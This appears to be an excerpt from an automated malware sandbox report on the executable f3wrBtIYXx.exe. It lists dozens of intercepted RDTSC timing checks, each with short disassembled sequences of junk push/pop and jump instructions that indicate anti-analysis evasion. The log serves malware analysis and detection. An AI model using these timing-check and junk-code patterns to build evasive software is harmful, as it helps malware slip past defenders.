Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94A49C second address: 94A4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94A4A0 second address: 94A4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5F64D1DF16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94A7A1 second address: 94A7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94A7A5 second address: 94A7A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94AA63 second address: 94AA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F5F64D1DAB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94AA72 second address: 94AA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94AD1C second address: 94AD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5F64D1DABBh 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F5F64D1DAC9h 0x00000013 jmp 00007F5F64D1DABDh 0x00000018 jnl 00007F5F64D1DAB6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94AD48 second address: 94AD4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B38B second address: 94B3AF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DAB6h 0x00000008 jmp 00007F5F64D1DAC2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jbe 00007F5F64D1DAB6h 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B3AF second address: 94B3B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B3B6 second address: 94B3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F5F64D1DAC9h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F5F64D1DAB8h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B3E6 second address: 94B406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF27h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B995 second address: 94B9AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94BF78 second address: 94BFA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF20h 0x00000007 jmp 00007F5F64D1DF1Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94BFA0 second address: 94BFA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94BFA6 second address: 94BFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d jns 00007F5F64D1DF1Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94BFC1 second address: 94BFEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F5F64D1DAB6h 0x0000000f jp 00007F5F64D1DAB6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 954A08 second address: 954A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 953D4B second address: 953D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 953EF1 second address: 953EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 954451 second address: 95446D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jo 00007F5F64D1DAB8h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9546FC second address: 95472E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF27h 0x00000009 jmp 00007F5F64D1DF27h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 960844 second address: 96084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 96084A second address: 960850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 960850 second address: 960855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95EFA1 second address: 95EFA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95F231 second address: 95F237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95F237 second address: 95F23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95F527 second address: 95F52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95F918 second address: 95F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95FFED second address: 95FFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95FFF3 second address: 95FFF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95FFF7 second address: 95FFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95FFFD second address: 96000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007F5F64D1DF1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95E767 second address: 95E76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95E76B second address: 95E771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 965C05 second address: 965C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 965DE1 second address: 965DF3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DF16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 96772F second address: 967748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F5F64D1DAB6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e jno 00007F5F64D1DAB6h 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 967748 second address: 96774C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975C63 second address: 975C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975C6D second address: 975C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B20ED second address: 8B2105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC2h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B2105 second address: 8B2148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5F64D1DF28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5F64D1DF24h 0x00000016 jmp 00007F5F64D1DF1Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B2148 second address: 8B214E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B214E second address: 8B2165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F5F64D1DF16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B2165 second address: 8B2169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975672 second address: 975676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975676 second address: 975680 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DAB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9757C3 second address: 9757F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5F64D1DF21h 0x0000000b ja 00007F5F64D1DF16h 0x00000011 jng 00007F5F64D1DF16h 0x00000017 jmp 00007F5F64D1DF1Bh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9757F2 second address: 975806 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5F64D1DABCh 0x00000008 jo 00007F5F64D1DAB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975806 second address: 975810 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5F64D1DF16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 978AAE second address: 978AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 978AB2 second address: 978AF8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jl 00007F5F64D1DF55h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jne 00007F5F64D1DF16h 0x0000001a pushad 0x0000001b popad 0x0000001c jo 00007F5F64D1DF16h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5F64D1DF1Eh 0x0000002a jmp 00007F5F64D1DF23h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 978AF8 second address: 978AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8A4D1E second address: 8A4D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5F64D1DF29h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 97A6CC second address: 97A6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 97A6D2 second address: 97A6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5F64D1DF1Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 97A837 second address: 97A83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 97A83B second address: 97A855 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a jmp 00007F5F64D1DF1Dh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 984CCE second address: 984CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 98A35C second address: 98A385 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5F64D1DF16h 0x00000008 jmp 00007F5F64D1DF21h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F5F64D1DF1Eh 0x00000015 pushad 0x00000016 popad 0x00000017 jng 00007F5F64D1DF16h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9932EC second address: 993306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993306 second address: 993359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF24h 0x00000007 jmp 00007F5F64D1DF1Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 jng 00007F5F64D1DF16h 0x00000016 jmp 00007F5F64D1DF20h 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F5F64D1DF1Fh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993644 second address: 993663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5F64D1DAC7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993663 second address: 993668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993668 second address: 99366E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99366E second address: 993674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993674 second address: 99367A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99367A second address: 993684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993684 second address: 99369D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DAC5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9947AA second address: 9947D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007F5F64D1DF16h 0x0000000f jmp 00007F5F64D1DF25h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99823F second address: 998244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 998244 second address: 998280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF23h 0x00000007 jbe 00007F5F64D1DF18h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jbe 00007F5F64D1DF32h 0x00000017 pushad 0x00000018 jmp 00007F5F64D1DF24h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 997E1C second address: 997E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 997E22 second address: 997E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99C07A second address: 99C07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99C07E second address: 99C082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99D7EF second address: 99D7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99D7F7 second address: 99D7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99D7FB second address: 99D7FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9A9E72 second address: 9A9E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5F64D1DF24h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA750 second address: 9BA75E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F5F64D1DAB6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA75E second address: 9BA78C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Ch 0x00000007 jmp 00007F5F64D1DF28h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA78C second address: 9BA792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA792 second address: 9BA79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA79A second address: 9BA7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5F64D1DABBh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA7AA second address: 9BA7C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF24h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA483 second address: 9BA4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC7h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D34B1 second address: 9D34B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D2F42 second address: 9D2F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D2F48 second address: 9D2F5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D2F5A second address: 9D2F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a jl 00007F5F64D1DAE8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D30F8 second address: 9D3102 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D3102 second address: 9D3108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D3108 second address: 9D310C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
